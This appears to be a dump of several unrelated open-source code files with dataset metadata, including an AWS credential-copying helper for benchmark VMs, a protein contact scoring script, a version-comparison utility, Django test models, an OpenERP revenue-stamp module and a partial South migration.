poly_count = shape[0] if len(shape) == 3 else 1
has_multiple = 1 if len(shape) > 2 else 0
geoms = numpy.empty((poly_count), dtype=object)
if has_multiple:
for i in range(poly_count):
line = stdlib.Geometry2(ogr.wkbLineString)
for pt in coords[i]:
line.AddPoint(float(pt[0]), float(pt[1]))
geoms[i] = line
else:
line = stdlib.Geometry2(ogr.wkbLineString)
for pt in coords:
line.AddPoint(float(pt[0]), float(pt[1]))
geoms[0] = line
return geoms | gpl-2.0 | 1,511,304,569,203,282,000 | 25.850416 | 115 | 0.632893 | false |
GoogleCloudPlatform/PerfKitBenchmarker | perfkitbenchmarker/linux_packages/aws_credentials.py | 1 | 4345 | # Copyright 2018 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing AWS credential file installation and cleanup helpers.
AWS credentials consist of a secret access key and its ID, stored in a single
file. Following PKB's AWS setup instructions (see
https://github.com/GoogleCloudPlatform/PerfKitBenchmarker#install-aws-cli-and-setup-authentication),
the default location of the file will be at ~/.aws/credentials
This package copies the credentials file to the remote VM to make them available
for calls from the VM to other AWS services, such as SQS or Kinesis.
"""
import configparser
import logging
import os
from absl import flags
from perfkitbenchmarker import data
from perfkitbenchmarker import errors
FLAGS = flags.FLAGS
flags.DEFINE_string(
'aws_credentials_local_path', os.path.join('~', '.aws'),
'Path where the AWS credential files can be found on the local machine.')
flags.DEFINE_string(
'aws_credentials_remote_path', '.aws',
'Path where the AWS credential files will be written on remote machines.')
flags.DEFINE_boolean(
'aws_credentials_overwrite', False,
'When set, if an AWS credential file already exists at the destination '
'specified by --aws_credentials_remote_path, it will be overwritten during '
'AWS credential file installation.')
flags.DEFINE_string('aws_s3_region', None, 'Region for the S3 bucket')
def _GetLocalPath():
"""Gets the expanded local path of the credential files.
Returns:
string. Path to the credential files on the local machine.
"""
return os.path.expanduser(FLAGS.aws_credentials_local_path)
def GetCredentials(credentials_file_name='credentials'):
"""Gets the credentials from the local credential file.
AWS credentials file is expected to be called 'credentials'.
AWS credentials file looks like this, and ends with a newline:
[default]
aws_access_key_id = {access_key}
aws_secret_access_key = {secret_access_key}
Args:
credentials_file_name: String name of the file containing the credentials.
Returns:
A string, string tuple of access_key and secret_access_key
"""
config = configparser.ConfigParser()
config.read(os.path.join(_GetLocalPath(), credentials_file_name))
key_id = config['default']['aws_access_key_id']
key = config['default']['aws_secret_access_key']
return key_id, key
def CheckPrerequisites():
"""Verifies that the required resources are present.
Raises:
perfkitbenchmarker.data.ResourceNotFound: On missing resource.
"""
local_path = _GetLocalPath()
if not os.path.exists(local_path):
raise data.ResourceNotFound(
'AWS credential files were not found at {0}'.format(local_path))
def Install(vm):
"""Copies credential files to the specified VM.
Args:
vm: BaseVirtualMachine. VM that receives the credential files.
Raises:
errors.Error: If the file destination on the VM already exists, and the
overwrite behavior is not specified via --aws_credentials_overwrite.
"""
local_path = _GetLocalPath()
remote_path = FLAGS.aws_credentials_remote_path
overwrite = FLAGS.aws_credentials_overwrite
try:
vm.RemoteCommand('[[ ! -e {0} ]]'.format(remote_path))
except errors.VirtualMachine.RemoteCommandError:
err_msg = 'File {0} already exists on VM {1}.'.format(remote_path, vm)
if overwrite:
logging.info('%s Overwriting.', err_msg)
else:
raise errors.Error(err_msg)
remote_dir = os.path.dirname(remote_path)
if remote_dir:
vm.RemoteCommand('mkdir -p {0}'.format(remote_dir))
vm.PushFile(local_path, remote_path)
def Uninstall(vm):
"""Deletes the credential files from the specified VM.
Args:
vm: BaseVirtualMachine. VM that has the credential files.
"""
vm.RemoveFile(FLAGS.aws_credentials_remote_path)
| apache-2.0 | -6,205,260,796,543,492,000 | 32.945313 | 100 | 0.736479 | false |
jshleap/Collaboration | contactList/contacts-classification.py | 1 | 4165 | #!/usr/bin/python
'''
Utility scripts for contacts
Copyright (C) 2012 Alex Safatli, Christian Blouin, Jose Sergio Hleap
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
E-mail: [email protected]
'''
import centroidContact
import getContactList
import sys
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
# Generates an adjacency list using the all-atom method
# (getContactList.py) and using the centroid method (centroidContact.py).
# Data for three plots are then found as follows:
#
# True Positive (TP): Number of contacts at a given threshold (also found with atom method).
# False Positive (FP): Number of contacts at a given threshold (not found in atom method).
# False Negative (FN): Number of contacts from atom method not predicted at a given threshold.
#
# specificity Sp = TP / (TP+FP)
# sensitivity Sv = TP / (TP+FN)
# F score = 2 * (Sp*Sv)/(Sp+Sv)
# If run from command line: $ python contacts-classification.py pdbFile.pdb
fIn = sys.argv[1]
TPs = [] # List to hold True Positives.
FPs = [] # List to hold False Positives.
FNs = [] # List to hold False Negatives.
specificities = [] # List to hold the specificities for these cutoffs.
sensitivities = [] # List to hold the sensitivities for these cutoffs.
fScores = [] # List to hold the F Scores for these cutoffs.
cutoffs = [x*0.5 for x in xrange(6,41)] # Cutoffs ranging from 3 to 20, 0.5 increments.
# Get atom-based adjacency list.
print "\nLoading file: " + fIn
print "Will first generate atom-based contact list. This will take up to a few minutes.\n"
atomBased = getContactList.processFile(fIn)
REF = atomBased.adjList # Adjacency list.
# Get centroid-based adjacency lists. Calculate appropriately.
print "\nNow, will generate centroid-based adjacency lists. This will take a little while.\n"
for x in cutoffs:
print "\nCutoff = " + str(x) + "\n"
c = centroidContact.processFile(fIn,x)
TP = len(set(REF).intersection(set(c)))
FP = len(set(c).difference(set(REF)))
FN = len(set(REF).difference(set(c)))
TPs.append(TP)
FPs.append(FP)
FNs.append(FN)
Sp = float(TP)/(TP+FP)
Sv = float(TP)/(TP+FN)
specificities.append(Sp)
sensitivities.append(Sv)
# Avoid division by zero.
fScore = 0 if ((Sp+Sv) == 0) else (2.0*((Sp*Sv)/(Sp+Sv)))
fScores.append(fScore)
# Plot the data.
plt.plot(cutoffs,specificities)
plt.title("Specificities for Contact Determination Methods")
plt.ylabel("Specificity")
plt.xlabel("Cutoff (Angstroms)")
pp = PdfPages('contact-Sp-plot.pdf')
plt.savefig(pp, format='pdf')
pp.close()
plt.clf()
plt.plot(cutoffs,sensitivities)
plt.title("Sensitivities for Contact Determination Methods")
plt.ylabel("Sensitivity")
plt.xlabel("Cutoff (Angstroms)")
pp = PdfPages('contact-Sv-plot.pdf')
plt.savefig(pp, format='pdf')
plt.clf()
pp.close()
plt.plot(cutoffs,fScores)
plt.title("F Scores for Contact Determination Methods")
plt.ylabel("F Score")
plt.xlabel("Cutoff (Angstroms)")
pp = PdfPages('contact-Fscore-plot.pdf')
plt.savefig(pp, format='pdf')
pp.close()
# Save raw data to CSV file.
fout = open('classifications.csv','w')
fout.write("Cutoff (Angstroms)" + "\t" + "Specificity" + "\t"
+ "Sensitivity" + "\t" + "F Score" +
"\t" + "TP" + "\t" + "FP" + "\t" + "FN" + "\n")
for x in xrange(0,len(cutoffs)):
fout.write(str(cutoffs[x]) + "\t" + str(specificities[x]) +
"\t" + str(sensitivities[x]) + "\t" + str(fScores[x])
+ "\t" + str(TPs[x]) + "\t" + str(FPs[x])
+ "\t" + str(FNs[x]) + "\n")
fout.close() | gpl-3.0 | 213,429,558,210,596,480 | 34.606838 | 94 | 0.690756 | false |
rlbabyuk/integration_tests | utils/version.py | 2 | 11791 | # -*- coding: utf-8 -*-
import re
from cached_property import cached_property
from collections import namedtuple
from datetime import date, datetime
import multimethods as mm
from fixtures.pytest_store import store
def get_product_version(ver):
"""Return product version for given Version obj or version string
"""
ver = Version(ver)
if ver.product_version() is not None:
return ver.product_version()
else:
raise LookupError("no matching product version found for version {}".format(ver))
def get_stream(ver):
"""Return a stream name for given Version obj or version string
"""
ver = Version(ver)
if ver.stream() is not None:
return ver.stream()
else:
raise LookupError("no matching stream found for version {}".format(ver))
def current_stream():
return get_stream(store.current_appliance.version)
def get_version(obj=None):
"""
Return a Version based on obj. For CFME, 'master' version
means always the latest (compares as greater than any other version)
If obj is None, the version will be retrieved from the current appliance
"""
if isinstance(obj, Version):
return obj
if obj.startswith('master'):
return Version.latest()
return Version(obj)
def current_version():
"""A lazy cached method to return the appliance version.
Do not catch errors, since generally we cannot proceed with
testing, without knowing the server version.
"""
return store.current_appliance.version
def appliance_build_datetime():
try:
return store.current_appliance.build_datetime
except:
return None
def appliance_build_date():
try:
return store.current_appliance.build_date
except:
return None
def appliance_is_downstream():
return store.current_appliance.is_downstream
def parsedate(o):
if isinstance(o, date):
return o
elif isinstance(o, datetime):
return o.date()
else:
# 1234-12-13
return date(*[int(x) for x in str(o).split("-", 2)])
def before_date_or_version(date=None, version=None):
"""Function for deciding based on the build date and version.
Usage:
* If both date and version are set, then two things can happen. If the appliance is
downstream, both date and version are checked, otherwise only the date.
* If only date is set, then only date is checked.
* if only version is set, then it checks the version if the appliance is downstream,
otherwise it returns ``False``
The checks are in form ``appliance_build_date() < date`` and ``current_version() < version``.
Therefore when used in ``if`` statement, the truthy value signalizes 'older' version and falsy
signalizes 'newer' version.
"""
if date is not None:
date = parsedate(date)
if date is not None and version is not None:
if not appliance_is_downstream():
return appliance_build_date() < date
else:
return appliance_build_date() < date and current_version() < version
elif date is not None and version is None:
return appliance_build_date() < date
elif date is None and version is not None:
if not appliance_is_downstream():
return False
return current_version() < version
else:
raise TypeError("You have to pass either date or version, or both!")
def since_date_or_version(*args, **kwargs):
"""Opposite of :py:func:`before_date_or_version`"""
return not before_date_or_version(*args, **kwargs)
def appliance_has_netapp():
try:
return store.current_appliance.has_netapp()
except:
return None
def product_version_dispatch(*_args, **_kwargs):
"""Dispatch function for use in multimethods that just ignores
arguments and dispatches on the current product version."""
return current_version()
def dependent(default_function):
m = mm.MultiMethod(default_function.__name__, product_version_dispatch)
m.add_method(mm.Default, default_function)
mm._copy_attrs(default_function, m)
return m
def pick(v_dict):
"""
Collapses an ambiguous series of objects bound to specific versions
by interrogating the CFME Version and returning the correct item.
"""
# convert keys to Versions
v_dict = {get_version(k): v for (k, v) in v_dict.items()}
versions = v_dict.keys()
sorted_matching_versions = sorted(filter(lambda v: v <= current_version(), versions),
reverse=True)
return v_dict.get(sorted_matching_versions[0]) if sorted_matching_versions else None
class Version(object):
"""Version class based on distutil.version.LooseVersion"""
SUFFIXES = ('nightly', 'pre', 'alpha', 'beta', 'rc')
SUFFIXES_STR = "|".join(r'-{}(?:\d+(?:\.\d+)?)?'.format(suff) for suff in SUFFIXES)
component_re = re.compile(r'(?:\s*(\d+|[a-z]+|\.|(?:{})+$))'.format(SUFFIXES_STR))
suffix_item_re = re.compile(r'^([^0-9]+)(\d+(?:\.\d+)?)?$')
def __init__(self, vstring):
self.parse(vstring)
def parse(self, vstring):
if vstring is None:
raise ValueError('Version string cannot be None')
elif isinstance(vstring, (list, tuple)):
vstring = ".".join(map(str, vstring))
elif vstring:
vstring = str(vstring).strip()
if vstring in ('master', 'latest', 'upstream') or 'fine' in vstring or 'euwe' in vstring:
vstring = 'master'
# TODO These aren't used anywhere - remove?
if vstring == 'darga-3':
vstring = '5.6.1'
if vstring == 'darga-4.1':
vstring = '5.6.2'
if vstring == 'darga-5':
vstring = '5.6.3'
components = filter(lambda x: x and x != '.',
self.component_re.findall(vstring))
# Check if we have a version suffix which denotes pre-release
if components and components[-1].startswith('-'):
self.suffix = components[-1][1:].split('-') # Chop off the -
components = components[:-1]
else:
self.suffix = None
for i in range(len(components)):
try:
components[i] = int(components[i])
except ValueError:
pass
self.vstring = vstring
self.version = components
@cached_property
def normalized_suffix(self):
"""Turns the string suffixes to numbers. Creates a list of tuples.
The list of tuples is consisting of 2-tuples, the first value says the position of the
suffix in the list and the second number the numeric value of an eventual numeric suffix.
If the numeric suffix is not present in a field, then the value is 0
"""
numberized = []
if self.suffix is None:
return numberized
for item in self.suffix:
suff_t, suff_ver = self.suffix_item_re.match(item).groups()
if suff_ver is None or len(suff_ver) == 0:
suff_ver = 0.0
else:
suff_ver = float(suff_ver)
suff_t = self.SUFFIXES.index(suff_t)
numberized.append((suff_t, suff_ver))
return numberized
@classmethod
def latest(cls):
try:
return cls._latest
except AttributeError:
cls._latest = cls('latest')
return cls._latest
@classmethod
def lowest(cls):
try:
return cls._lowest
except AttributeError:
cls._lowest = cls('lowest')
return cls._lowest
def __str__(self):
return self.vstring
def __repr__(self):
return '{}({})'.format(type(self).__name__, repr(self.vstring))
def __cmp__(self, other):
try:
if not isinstance(other, type(self)):
other = Version(other)
except:
raise ValueError('Cannot compare Version to {}'.format(type(other).__name__))
if self == other:
return 0
elif self == self.latest() or other == self.lowest():
return 1
elif self == self.lowest() or other == self.latest():
return -1
else:
result = cmp(self.version, other.version)
if result != 0:
return result
# Use suffixes to decide
if self.suffix is None and other.suffix is None:
# No suffix, the same
return 0
elif self.suffix is None:
# This does not have suffix but the other does so this is "newer"
return 1
elif other.suffix is None:
# This one does have suffix and the other does not so this one is older
return -1
else:
# Both have suffixes, so do some math
return cmp(self.normalized_suffix, other.normalized_suffix)
def __eq__(self, other):
try:
if not isinstance(other, type(self)):
other = Version(other)
return (
self.version == other.version and self.normalized_suffix == other.normalized_suffix)
except:
return False
def __contains__(self, ver):
"""Enables to use ``in`` expression for :py:meth:`Version.is_in_series`.
Example:
``"5.5.5.2" in Version("5.5") returns ``True``
Args:
ver: Version that should be checked if it is in series of this version. If
:py:class:`str` provided, it will be converted to :py:class:`Version`.
"""
try:
return Version(ver).is_in_series(self)
except:
return False
def is_in_series(self, series):
"""This method checks whether the version belongs to another version's series.
Eg.: ``Version("5.5.5.2").is_in_series("5.5")`` returns ``True``
Args:
series: Another :py:class:`Version` to check against. If string provided, will be
converted to :py:class:`Version`
"""
if not isinstance(series, Version):
series = get_version(series)
if self in {self.lowest(), self.latest()}:
if series == self:
return True
else:
return False
return series.version == self.version[:len(series.version)]
def series(self, n=2):
return ".".join(self.vstring.split(".")[:n])
def stream(self):
for v, spt in version_stream_product_mapping.items():
if self.is_in_series(v):
return spt.stream
def product_version(self):
for v, spt in version_stream_product_mapping.items():
if self.is_in_series(v):
return spt.product_version
LOWEST = Version.lowest()
LATEST = Version.latest()
UPSTREAM = LATEST
SPTuple = namedtuple('StreamProductTuple', ['stream', 'product_version'])
# Maps stream and product version to each app version
version_stream_product_mapping = {
'5.2': SPTuple('downstream-52z', '3.0'),
'5.3': SPTuple('downstream-53z', '3.1'),
'5.4': SPTuple('downstream-54z', '3.2'),
'5.5': SPTuple('downstream-55z', '4.0'),
'5.6': SPTuple('downstream-56z', '4.1'),
'5.7': SPTuple('downstream-57z', '4.2'),
'5.8': SPTuple('downstream-58z', '4.5'),
LATEST: SPTuple('upstream', 'master')
}
# Compare Versions using > for dispatch
@mm.is_a.method((Version, Version))
def _is_a_loose(x, y):
return x >= y
@mm.is_a.method((str, Version))
def _is_a_slv(x, y):
return mm.is_a(Version(x), y)
@mm.is_a.method((Version, str))
def _is_a_lvs(x, y):
return mm.is_a(x, Version(y))
| gpl-2.0 | -7,340,382,520,080,808,000 | 31.128065 | 100 | 0.592571 | false |
tayfun/django | tests/auth_tests/models/invalid_models.py | 251 | 1340 | from django.contrib.auth.models import AbstractBaseUser, UserManager
from django.db import models
class CustomUserNonUniqueUsername(AbstractBaseUser):
"""
A user with a non-unique username.
This model is not invalid if it is used with a custom authentication
backend which supports non-unique usernames.
"""
username = models.CharField(max_length=30)
email = models.EmailField(blank=True)
is_staff = models.BooleanField(default=False)
is_superuser = models.BooleanField(default=False)
USERNAME_FIELD = 'username'
REQUIRED_FIELDS = ['email']
objects = UserManager()
class Meta:
app_label = 'auth'
class CustomUserNonListRequiredFields(AbstractBaseUser):
"A user with a non-list REQUIRED_FIELDS"
username = models.CharField(max_length=30, unique=True)
date_of_birth = models.DateField()
USERNAME_FIELD = 'username'
REQUIRED_FIELDS = 'date_of_birth'
class Meta:
app_label = 'auth'
class CustomUserBadRequiredFields(AbstractBaseUser):
"A user with a USERNAME_FIELD that appears in REQUIRED_FIELDS (invalid)"
username = models.CharField(max_length=30, unique=True)
date_of_birth = models.DateField()
USERNAME_FIELD = 'username'
REQUIRED_FIELDS = ['username', 'date_of_birth']
class Meta:
app_label = 'auth'
| bsd-3-clause | 2,337,087,557,338,380,000 | 27.510638 | 76 | 0.704478 | false |
iw3hxn/LibrERP | revenue_stamp/revenue_stamp.py | 3 | 7654 | # -*- encoding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2014 Didotech SRL (info at didotech.com)
# All Rights Reserved.
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
from osv import osv, fields
class partner(osv.osv):
_inherit = 'res.partner'
_columns = {
'charge_revenue_stamp': fields.boolean('Revenue stamp Charged in Invoice', help="In case VAT free, revenue stamp's cost will be charged in invoices."),
'charge_invoice_cost': fields.boolean('Costs Charged in Invoice', help="Costs will be charged in invoices."),
'product_toinvoice_ids': fields.one2many('toinvoice.product', 'product_toinvoice_id', 'Invoice Costs'),
}
class unique_revenue_product(osv.osv):
_name = 'unique.revenue.product'
_description = 'Unique revenue product'
_columns = {
'name': fields.char('Description', size=50,),
'unique_revenue_stamp': fields.boolean('Product for revenue stamp'),
'min_for_stamp': fields.float('Minimal amount for stamp charged in invoice'),
}
_defaults = {
'min_for_stamp': 77.48,
}
_sql_constraints = [
('unique_revenue_stamp', 'unique (unique_revenue_stamp)', 'The revenue stamp product must be unique !'),
]
class toinvoice_product(osv.osv):
_name = 'toinvoice.product'
_columns = {
'name': fields.char('Notes', size=50,),
'product_toinvoice_id': fields.many2one('res.partner', 'Partner related'),
'product_id': fields.many2one('product.product', 'Products to be charged in invoices'),
'qty': fields.float('Quantity to be invoiced'),
}
class product_product(osv.osv):
_inherit = 'product.product'
_columns = {
'unique_revenue_stamp_id': fields.many2one('unique.revenue.product', 'Product id for revenue stamp'),
}
_sql_constraints = [
('unique_revenue_stamp_id', 'unique (unique_revenue_stamp_id)', 'The revenue stamp product must be unique !'),
]
class account_tax_code(osv.osv):
_inherit = 'account.tax.code'
_columns = {
'stamp_in_invoice': fields.boolean('Stamp Charged in Invoice', help="Revenue stamp's cost charged in invoices."),
}
class account_invoice(osv.osv):
_inherit = 'account.invoice'
def button_reset_taxes(self, cr, uid, ids, context=None):
result = super(account_invoice, self).button_reset_taxes(cr, uid, ids, context)
self.revenue_stamp(cr, uid, ids, context)
return result
def action_number(self, cr, uid, ids, context=None):
super(account_invoice, self).action_number(cr, uid, ids, context)
self.revenue_stamp(cr, uid, ids, context)
return True
def revenue_stamp(self, cr, uid, ids, context=None):
"""
This function will add line with revenue stamp charge product:
If partner has 'charge_revenue_stamp' selected it will add product and cost of revenue stamp
Else, it will add product without cost
"""
if not ids:
return True
if isinstance(ids, (list, tuple)):
ids = ids[0]
product_toinvoice_ids = []
invoice = self.browse(cr, uid, ids, context)
if not invoice.partner_id or not invoice.invoice_line:
return False
partner = invoice.partner_id
product_obj = self.pool.get('product.product')
revenue_product_id = product_obj.search(cr, uid, [('unique_revenue_stamp_id.unique_revenue_stamp', '=', True)])
if revenue_product_id:
revenue_product = product_obj.browse(cr, uid, revenue_product_id[0], context)
if partner.charge_invoice_cost:
for product_toinvoice_id in partner.product_toinvoice_ids:
product_toinvoice_ids.append(product_toinvoice_id.product_id.id)
base_tax_amount = 0.0
for invoice_tax in invoice.tax_line:
if invoice_tax.tax_code_id.stamp_in_invoice:
base_tax_amount += invoice_tax.base_amount
add_product_stamp = False
if base_tax_amount >= revenue_product.unique_revenue_stamp_id.min_for_stamp:
add_product_stamp = True
if partner.charge_revenue_stamp:
price = revenue_product.product_tmpl_id.list_price
else:
price = 0.0
for invoice_line in invoice.invoice_line:
if invoice_line.product_id.id == revenue_product_id[0]:
add_product_stamp = False
for invoice_product_id in product_toinvoice_ids:
if invoice_line.product_id.id == invoice_product_id:
product_toinvoice_ids.remove(invoice_product_id)
invoice_lines = []
if add_product_stamp:
invoice_lines.append({
'name': revenue_product.name,
'product_id': revenue_product_id[0],
'quantity': 1.0,
'uos_id': revenue_product.product_tmpl_id.uom_id.id,
'price_unit': price,
'price_subtotal': price,
'partner_id': partner.id,
'invoice_id': invoice.id,
'account_id': invoice.invoice_line[0].account_id.id,
'company_id': invoice.company_id.id,
})
if product_toinvoice_ids:
partner_toinvoice_products = self.pool.get('toinvoice.product').browse(cr, uid, product_toinvoice_ids, context)
for partner_toinvoice_product in partner_toinvoice_products:
invoice_lines.append({
'name': partner_toinvoice_product.product_id.name,
'product_id': partner_toinvoice_product.product_id.id,
'quantity': partner_toinvoice_product.qty,
'uos_id': partner_toinvoice_product.product_id.product_tmpl_id.uom_id.id,
'price_unit': partner_toinvoice_product.product_id.product_tmpl_id.list_price,
'price_subtotal': partner_toinvoice_product.product_id.product_tmpl_id.list_price,
'partner_id': partner.id,
'invoice_id': invoice.id,
'account_id': invoice.invoice_line[0].account_id.id,
'company_id': invoice.company_id.id,
})
invoice_line_obj = self.pool.get('account.invoice.line')
for invoice_line in invoice_lines:
invoice_line_obj.create(cr, uid, invoice_line, context)
return True
| agpl-3.0 | 90,073,274,615,023,060 | 41.759777 | 159 | 0.615495 | false |
SivilTaram/edx-platform | lms/djangoapps/shoppingcart/migrations/0018_auto__add_donation.py | 120 | 15611 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Donation'
db.create_table('shoppingcart_donation', (
('orderitem_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['shoppingcart.OrderItem'], unique=True, primary_key=True)),
('donation_type', self.gf('django.db.models.fields.CharField')(default='general', max_length=32)),
('course_id', self.gf('xmodule_django.models.CourseKeyField')(max_length=255, db_index=True)),
))
db.send_create_signal('shoppingcart', ['Donation'])
def backwards(self, orm):
# Deleting model 'Donation'
db.delete_table('shoppingcart_donation')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'shoppingcart.certificateitem': {
'Meta': {'object_name': 'CertificateItem', '_ormbases': ['shoppingcart.OrderItem']},
'course_enrollment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['student.CourseEnrollment']"}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.coupon': {
'Meta': {'object_name': 'Coupon'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 10, 2, 0, 0)'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'percentage_discount': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'shoppingcart.couponredemption': {
'Meta': {'object_name': 'CouponRedemption'},
'coupon': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Coupon']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Order']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.courseregistrationcode': {
'Meta': {'object_name': 'CourseRegistrationCode'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 10, 2, 0, 0)'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_by_user'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invoice': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Invoice']", 'null': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'purchase_order'", 'null': 'True', 'to': "orm['shoppingcart.Order']"})
},
'shoppingcart.donation': {
'Meta': {'object_name': 'Donation', '_ormbases': ['shoppingcart.OrderItem']},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'donation_type': ('django.db.models.fields.CharField', [], {'default': "'general'", 'max_length': '32'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.invoice': {
'Meta': {'object_name': 'Invoice'},
'address_line_1': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'address_line_2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'address_line_3': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'company_contact_email': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'company_contact_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'company_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'customer_reference_number': ('django.db.models.fields.CharField', [], {'max_length': '63', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_reference': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'is_valid': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'recipient_email': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
